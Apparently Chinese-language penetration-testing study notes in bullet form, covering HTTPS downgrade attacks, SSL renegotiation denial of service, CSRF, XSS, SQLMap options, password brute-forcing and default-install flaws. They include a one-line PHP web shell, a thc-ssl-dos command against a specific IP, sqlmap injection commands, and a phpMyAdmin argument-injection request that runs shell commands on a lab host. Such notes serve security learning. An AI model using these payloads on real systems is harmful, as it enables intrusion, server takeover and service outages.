HTTPS攻击

• 全站https正成为潮流趋势
  • 淘宝、百度
• HTTPS的作用
  • CIA
  • 解决的是信息传输过程中数据被篡改、窃取
  • 加密：对称、非对称、单向
• HTTPS攻击方法
  • 降级攻击
    • 将高强度算法降级为低强度算法
  • 解密攻击（明文、证书伪造）
  • 协议漏洞、https实现方法的漏洞、配置不严格

• <?php echo shell_exec($_GET[‘cmd’]);?>
• 中国菜刀：http://www.maicaidao.co
• 可能被IDS、AV、WAF、扫描器软件发现查杀

SSL/TLS拒绝服务攻击

• thc-ssl-dos
  • ssl协商加密对性能开销大，大量握手请求会导致拒绝服务
  • 利用SSL secure Renegotiation特性，在单一TCP连接中生成数千个SSL重连接请求，造成服务器资源过载
  • 与流量式拒绝服务攻击不同，thc-ssl-dos可以利用dsl线路打垮30G带宽的服务器
  • 服务器平均可以处理300次/秒SSL握手请求
  • 对SMTPS、POP3S、等服务同样有效
  • thc-ssl-dos 199.223.209.205 2804 -accept

CSRF（Cross-site request forgery）

• 从信任的角度来区分
  • XSS：利用用户对站点的信任
  • CSRF：利用站点对已经身份认证的信任

XSS

• 攻击web客户端
• 客户端脚本语言
  • 弹窗告警、广告
  • Javascript
  • 在浏览器中执行
• XSS（cross-site scripting）
  • 通过web站点漏洞，向客户端交付恶意脚本代码，实现对客户端的攻击目的
  • 注入客户端脚本代码
  • 盗取cookie
  • 重定向

SQLMap自动注入-Injection

• -p
  • 指定扫描的参数，使–level失效
  • -p “user-agent,referer”
• –skip
  • 排除指定的扫描参数
  • –level=5 –skip=”id,user-agent”

SQLMap自动注入-Request

基本数据

• 数据段： –data
  • get/post都使用
  • sqlmap -u “http://1.1.1.1/a.php” –data=”user=1&pass=2”-f
• 变量分隔符：–param-del
  • http://1.1.1.1/a.php?q=foo;id=1 //用；替换&
  • sqlmap -u “http://1.1.1.1/a.php" –data=”q=foo;id=1” –param-del=”;” -f

SQLMap自动注入

• 开源sql注入漏洞检测、利用工具
• 检测动态页面中get/post参数、cookie、http头
• 数据榨取
• 文件系统访问
• 操作系统命令执行
• 引擎强大、特性丰富
• Xss漏洞检测

身份认证

账号密码

• 常用弱口令/基于字典的密码爆破
• 锁定账号
  • 先手动多试几次，如果没有锁定机制，就可以爆破。
• 信息收集
  • 手机号
  • 密码错误提示信息
    • 一些隐藏的信息比如错误码
  • 去分站搜集账号相关信息

手动漏洞挖掘-默认安装

• Windows默认安装漏洞

• phpMyAdmin/setup

  • MetaSploitable

    1 2 3 4 5 6 7 8

    POST http:///phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.20.10 Content-Length: 40 <?php passthru('pwd&&ls'); die(); ?>